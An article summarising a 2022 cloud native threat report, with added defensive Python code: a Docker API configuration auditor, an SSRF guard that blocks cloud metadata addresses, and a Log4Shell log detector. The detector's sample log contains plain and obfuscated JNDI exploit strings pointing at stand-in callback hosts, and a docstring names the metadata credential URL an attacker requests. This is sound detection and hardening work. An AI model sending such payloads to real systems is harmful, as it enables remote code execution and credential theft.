As companies continue to adopt cloud native technologies at a rapid pace, an increasing number of cyber threats are targeting the cloud native environment. To defend against these threats, security practitioners must stay abreast of attackers’ evolving tactics, techniques, and procedures. For its 2022 Cloud Native Threat report, Aqua’s Team Nautilus analyzed attacks that were observed in the wild over the past year to highlight the latest developments in the threat landscape.
While attacks are becoming more sophisticated, attackers are still on the lookout for easy targets, and Kubernetes is becoming one. And although the veteran cloud native attacker TeamTNT appears to be slowing its activity, traditional attack tactics are increasingly being used in the cloud native space.
Here are key takeaways from the 2022 Cloud Native Threat Report.
Threat actors’ tactics, techniques, and procedures are more sophisticated
While cryptominers remained the most common malware that was observed in 2021, attackers made increasing use of backdoors and worms. Backdoors were encountered in 54% of attacks, up 9 percentage points from 2020, and worms were used in 51% of attacks, a 10 percentage-point increase.
Team Nautilus also observed more sophisticated activity involving rootkits, fileless execution, and loading kernel modules. In cloud native environments, rootkits executed on the host can be used to hide malicious processes and to reduce the chances of detection after attackers have escaped from the containerized environment.
Attention shifts from Docker to Kubernetes and the CI/CD pipeline
Misconfigured Docker APIs were still a popular target for attackers. Effective use of public search engines, such as Shodan and Censys, and scanning tools meant that the median time it took a threat actor to detect an exposed, misconfigured Docker API was just 56 minutes.
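The misconfiguration behind those 56-minute discoveries is usually a Docker daemon bound to a TCP port without client-certificate authentication. The following is an added example, not code from the report or from Docker: a small audit function that reads a daemon.json and reports any TCP listener that is reachable without mutual TLS. The three configurations are constructed for illustration; the keys they use (hosts, tls, tlsverify, tlscacert, tlscert, tlskey) are Docker's real daemon.json options.

```python
"""Audit a Docker daemon.json for the remote-API misconfiguration attackers scan for.

Added example, not from the report. The sample configurations are constructed;
the daemon.json keys are Docker's own.
"""
import json
from urllib.parse import urlsplit

# Constructed sample: the classic misconfiguration. Listening on every interface
# on 2375 with no TLS means anyone who can reach the port controls the host.
EXPOSED_CONFIG = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Constructed sample: TLS enabled but client certificates not required.
# "tls": true only encrypts the connection; without "tlsverify" any client may connect.
ENCRYPTED_BUT_OPEN_CONFIG = json.dumps({
    "hosts": ["tcp://0.0.0.0:2376"],
    "tls": True,
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Constructed sample: the corrected form. Mutual TLS with a private CA, so only
# holders of a client certificate signed by that CA can talk to the API.
HARDENED_CONFIG = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})


def audit_daemon_config(raw_json: str) -> list:
    """Return a list of findings for the given daemon.json contents.

    An empty list means no TCP listener is reachable without client-certificate
    authentication. Only the daemon's own configuration is inspected: a -H flag
    on the dockerd command line or a host firewall can override it, so treat a
    clean result as necessary, not sufficient.
    """
    cfg = json.loads(raw_json)
    findings = []
    tcp_hosts = [urlsplit(h) for h in cfg.get("hosts", [])
                 if urlsplit(h).scheme == "tcp"]
    if not tcp_hosts:
        return findings  # Unix socket only: not reachable over the network.

    # tlsverify without a CA to verify against does nothing useful, so require both.
    mutual_tls = bool(cfg.get("tlsverify")) and bool(cfg.get("tlscacert"))
    for parts in tcp_hosts:
        host = parts.hostname or ""
        if host in ("0.0.0.0", "", "::"):
            scope = "all interfaces"
        elif host in ("127.0.0.1", "localhost", "::1"):
            scope = "loopback only"
        else:
            scope = f"interface {host}"
        if mutual_tls:
            continue
        if cfg.get("tls"):
            findings.append(f"{parts.netloc}: TLS without tlsverify/tlscacert; "
                            f"encrypted but unauthenticated Docker API on {scope}")
        else:
            findings.append(f"{parts.netloc}: plaintext, unauthenticated "
                            f"Docker API on {scope}")
    return findings


if __name__ == "__main__":
    for name, raw in [("exposed", EXPOSED_CONFIG),
                      ("encrypted-but-open", ENCRYPTED_BUT_OPEN_CONFIG),
                      ("hardened", HARDENED_CONFIG)]:
        print(name, audit_daemon_config(raw) or ["OK"])
```

The second sample is the case practitioners most often get wrong: "tls": true on its own gives an encrypted but still anonymous API, which a scanner that speaks TLS will find just as quickly as a plaintext one.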
But Team Nautilus observed a slight decline in such attacks as threat actors began to broaden their targets to include vulnerable CI/CD and Kubernetes environments. Kubernetes' broad attack surface proved particularly enticing to threat actors. The share of malicious container images that targeted Kubernetes environments rose by 10 percentage points in 2021, to 19%.
Traditional attack tactics used to target cloud native
In 2021, Team Nautilus observed attackers using traditional tactics such as password cracking and exploiting vulnerabilities in applications in an effort to steal cloud metadata.
This activity implies that attackers are adding techniques tailored to applications running in cloud environments, and it suggests that large botnets such as Mirai, Muhstik, and Kinsing have evolved to include them.
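The report does not name the application vulnerability class involved; the route most often used to steal cloud metadata is server-side request forgery (SSRF) in a feature that fetches user-supplied URLs, which lets the attacker reach the instance metadata service (IMDS) from inside the instance. The following is an added example, not code from the report: the vulnerable fetch beside a guarded one that resolves the target, rejects any address in a metadata or link-local range, pins the connection to the validated address, and refuses redirects. The resolver is injectable so the check can be exercised offline; the blocked addresses are the well-known metadata endpoints, and the toy fetch functions are assumptions for illustration.

```python
"""Keep an application-level URL fetcher away from the cloud metadata service.

Added example, not from the report. The fetch functions are illustrative;
the resolver is injectable so the guard can be tested without DNS.
"""
import http.client
import ipaddress
import socket
import urllib.request
from typing import Callable, List
from urllib.parse import urlsplit

# Addresses an application fetcher must never reach. 169.254.169.254 is the IMDS
# address on AWS, Azure, GCP and others; fd00:ec2::254 is the AWS IPv6 IMDS
# address; 100.100.100.200 is used by Alibaba Cloud. Loopback is blocked because
# local admin APIs (kubelet, Docker on 127.0.0.1) are the next thing attackers try.
BLOCKED_NETWORKS = [
    ipaddress.ip_network("169.254.0.0/16"),     # IPv4 link-local, includes IMDS
    ipaddress.ip_network("fe80::/10"),          # IPv6 link-local
    ipaddress.ip_network("fd00:ec2::254/128"),
    ipaddress.ip_network("100.100.100.200/32"),
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("::1/128"),
]

Resolver = Callable[[str], List[str]]


def default_resolver(host: str) -> List[str]:
    """System resolver, returning every A and AAAA answer. getaddrinfo also
    accepts decimal (2852039166) and hex (0xa9fea9fe) IPv4 spellings, so those
    obfuscated forms end up checked as 169.254.169.254 rather than passed through."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def resolve_target(url: str, resolver: Resolver = default_resolver) -> List[str]:
    """Return the addresses a fetch of url would connect to, or raise ValueError
    if any of them is blocked. Every resolved address is checked, so a name that
    mixes a public record with a link-local one is still rejected."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise ValueError("URL has no host")
    try:
        addrs = [str(ipaddress.ip_address(host))]   # IP literal, incl. [ipv6]
    except ValueError:
        addrs = resolver(host)
    for a in addrs:
        ip = ipaddress.ip_address(a)
        # Unwrap IPv4-mapped IPv6 (::ffff:169.254.169.254) before range checks.
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped
        if any(ip in net for net in BLOCKED_NETWORKS):
            raise ValueError(f"{url} resolves to blocked address {ip}")
    return addrs


def fetch_unsafe(url: str) -> bytes:
    """The vulnerable pattern: fetch whatever the user supplied. With
    http://169.254.169.254/latest/meta-data/iam/security-credentials/ this hands
    the instance role's temporary credentials to the attacker."""
    with urllib.request.urlopen(url, timeout=3) as resp:
        return resp.read()


def fetch_guarded(url: str, resolver: Resolver = default_resolver) -> bytes:
    """Hardened fetch for http:// URLs. Connects to the address that was validated
    (not to the name again, so a DNS answer that changes between check and use
    cannot redirect the connection), sends the original Host header, and refuses
    redirects, since a 30x to the metadata address would otherwise bypass the check.
    For https://, wrap the socket with server_hostname=parts.hostname; omitted here."""
    parts = urlsplit(url)
    if parts.scheme != "http":
        raise ValueError("this example pins plaintext HTTP only")
    addr = resolve_target(url, resolver)[0]
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    conn = http.client.HTTPConnection(addr, parts.port or 80, timeout=5)
    try:
        conn.request("GET", path, headers={"Host": parts.netloc})
        resp = conn.getresponse()
        if 300 <= resp.status < 400:
            raise ValueError(f"refusing redirect to {resp.getheader('Location')}")
        return resp.read()
    finally:
        conn.close()
```

On AWS, requiring IMDSv2 (a session token obtained with a PUT, and a hop limit of 1) is the complementary control: a forged GET from an application cannot present the token, so even an SSRF that slips past the guard gets nothing back.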
To get more insights into the evolving threat landscape, check out the full 2022 Cloud Native Threat Report.
Software supply chain attacks continued to surge
The software supply chain was a prime target for attacks in 2021, with the estimated number of such attacks rising by at least 300% year over year. Threat actors focused their efforts on exploiting open source vulnerabilities, poisoning widely used open source packages, compromising CI/CD tools and code integrity, and manipulating the build process.
An analysis of over 1,100 container images uploaded to one of the world’s largest image libraries in the past year concluded that 13% were related to potentially unwanted applications, such as cryptominers, and 1.3% were related to malware.
The Log4j vulnerability was exploited almost immediately
The zero-day vulnerability (CVE-2021-44228) in the popular logging library Log4j, which was published in December 2021, galvanized threat actors and left organizations scrambling to determine whether—or how—they were affected.
A honeypot established by Team Nautilus detected dozens of attacks in just a few hours. Some were one-off attempts that hit the honeypot only once or twice, while others targeted it every few minutes, which suggested activity by large botnets. Multiple malicious techniques were detected, including known malware, fileless execution, files that were downloaded and executed from memory, and reverse shell executions.
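The probes a honeypot like this records carry the JNDI lookup string in a request header or path, and within days attackers were nesting Log4j lookups such as ${lower:...} and ${...:-x} to evade detections that only searched for the literal "${jndi:". As an added example (not code from the report or the honeypot), the following detector percent-decodes each log line, evaluates the obfuscation lookups the way the vulnerable library would, and then extracts the callback scheme and host. The five log lines are constructed to resemble combined-format web logs; the addresses and hostnames in them are documentation ranges, not real infrastructure.

```python
"""Flag Log4Shell (CVE-2021-44228) probes in web logs, including obfuscated forms.

Added example, not from the report. SAMPLE_LOG is constructed. The lookup forms
handled (${lower:x}, ${upper:x}, ${name:-default}, ${env:NAME:-default}) are
Log4j 2 lookup syntax that attackers nest to hide the "${jndi:" token.
"""
import re
from typing import List, Optional
from urllib.parse import unquote

# An innermost lookup: ${...} whose body contains no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The thing we are looking for once the obfuscation is peeled away.
_JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)", re.IGNORECASE)

# Constructed sample log (Apache combined format). Line 0 is benign traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:03:40 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:05:02 +0000] "GET /?x=${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://198.51.100.7:1389/a} HTTP/1.1" 404 0 "-" "-"',
    '10.0.0.12 - - [10/Dec/2021:14:06:15 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.4:1099/Exploit}"',
    '10.0.0.15 - - [10/Dec/2021:14:07:58 +0000] "GET /%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%3Adns%3A%2F%2Fcallback.example.test%2Fa%7D HTTP/1.1" 404 0 "-" "-"',
]


def _evaluate(m: re.Match) -> str:
    """Evaluate one innermost lookup. Only the lookups used for obfuscation are
    modeled; anything else (notably jndi itself) is left in place literally."""
    body = m.group(1)
    _key, sep, default = body.partition(":-")
    if sep:                                  # ${anything:-value} -> value
        return default
    kind, sep2, arg = body.partition(":")
    if sep2 and kind.lower() == "lower":
        return arg.lower()
    if sep2 and kind.lower() == "upper":
        return arg.upper()
    return m.group(0)


def normalize_lookups(s: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out until nothing changes, so
    ${${lower:J}ndi:${::-l}dap://...} becomes ${jndi:ldap://...}. The round
    cap bounds work on pathological input."""
    for _ in range(max_rounds):
        new = _INNER.sub(_evaluate, s)
        if new == s:
            break
        s = new
    return s


def detect_log4shell(line: str) -> Optional[dict]:
    """Return scheme, host and whether obfuscation was used, or None if the
    line carries no JNDI lookup."""
    decoded = unquote(line)                  # probes are often percent-encoded in the path
    norm = normalize_lookups(decoded)
    m = _JNDI.search(norm)
    if not m:
        return None
    return {"scheme": m.group("scheme").lower(),
            "host": m.group("host"),
            "obfuscated": norm != decoded}


def scan_log(lines: List[str]) -> List[dict]:
    """Run the detector over a log, tagging each hit with its line index."""
    hits = []
    for i, line in enumerate(lines):
        hit = detect_log4shell(line)
        if hit:
            hit["line"] = i
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The callback hosts this extracts are what a responder wants first: they are the attacker's LDAP, RMI or DNS listeners, so they can be blocked at egress and used to pivot through other logs. Note the dns:// variant on the last line, which fetches no class but still confirms to the attacker that the target is vulnerable.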
TeamTNT: Retired—or not?
TeamTNT, a major threat actor targeting cloud native environments, announced its retirement in December 2021. However, it was still actively attacking Team Nautilus honeypots a month later.
Because no new tactics appeared, it remains unclear whether the ongoing attacks came from still-running automated attack infrastructure or from TeamTNT operators continuing to conduct attacks. Some of the group's command-and-control servers, a third-party registry, and a worm were still infecting new targets.
How to protect your organization
The migration to cloud native continues apace, for both organizations and threat actors. To defend against the growing number and variety of cyber threats that target cloud native environments, practitioners must enforce runtime security, take a layered approach to Kubernetes defenses, and scan images and code during development.